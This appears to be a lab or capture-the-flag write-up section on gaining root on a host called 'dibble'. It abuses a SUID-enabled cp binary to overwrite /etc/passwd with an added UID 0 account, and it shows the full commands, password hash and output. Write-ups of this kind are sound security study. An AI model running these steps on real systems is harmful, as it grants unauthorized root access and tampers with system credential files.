# Priv Escalation ### cp SUID ![](https://3868152014-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTn82w6MG57eLAc1baUIU%2Fuploads%2FJ4QlMWCVfvyiCUHbJ8RO%2F2022-08-02_11-09.png?alt=media\&token=28e522f8-483e-4f2b-a242-75812940ff90) Initial linpeas output proved to be interesting since I was able to identify multiple vulnerabilites. One exploiting $PATH and another using the command cp since it has SUID set. {% embed url="" %} This article here explained it really well but basically we create our own root user and we add his profile to the passwd file and we overwrite it with cp. #### Steps Copy the contents of the /etc/passwd file to a file of our own. ``` [benjamin@dibble tmp]$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin systemd-coredump:x:999:997:systemd Core Dumper:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin systemd-timesync:x:998:996:systemd Time Synchronization:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin unbound:x:997:994:Unbound DNS resolver:/etc/unbound:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin chrony:x:996:993::/var/lib/chrony:/sbin/nologin benjamin:x:1000:1000::/home/benjamin:/bin/bash mongod:x:995:992:mongod:/var/lib/mongo:/bin/false apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin nginx:x:994:991:Nginx web server:/var/lib/nginx:/sbin/nologin ``` Generate our new user ``` [benjamin@dibble tmp]$ openssl passwd -1 -salt lyethar pass123 $1$lyethar$/YpLdL9gB8tiM28MCkQL9/ ``` Put it in our file using the following format ``` lyethar:$1$lyethar$/YpLdL9gB8tiM28MCkQL9/:0:0:root:/root:/bin/bash ``` Copy it and over write the /etc/passwd file. ``` [benjamin@dibble tmp]$ cp passwd /etc/passwd [benjamin@dibble tmp]$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin systemd-coredump:x:999:997:systemd Core Dumper:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin systemd-timesync:x:998:996:systemd Time Synchronization:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin unbound:x:997:994:Unbound DNS resolver:/etc/unbound:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin chrony:x:996:993::/var/lib/chrony:/sbin/nologin benjamin:x:1000:1000::/home/benjamin:/bin/bash mongod:x:995:992:mongod:/var/lib/mongo:/bin/false apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin nginx:x:994:991:Nginx web server:/var/lib/nginx:/sbin/nologin lyethar:$1$lyethar$/YpLdL9gB8tiM28MCkQL9/:0:0:root:/root:/bin/bash ``` Switch users ``` [benjamin@dibble tmp]$ su lyethar Password: [root@dibble tmp]# whoami root ```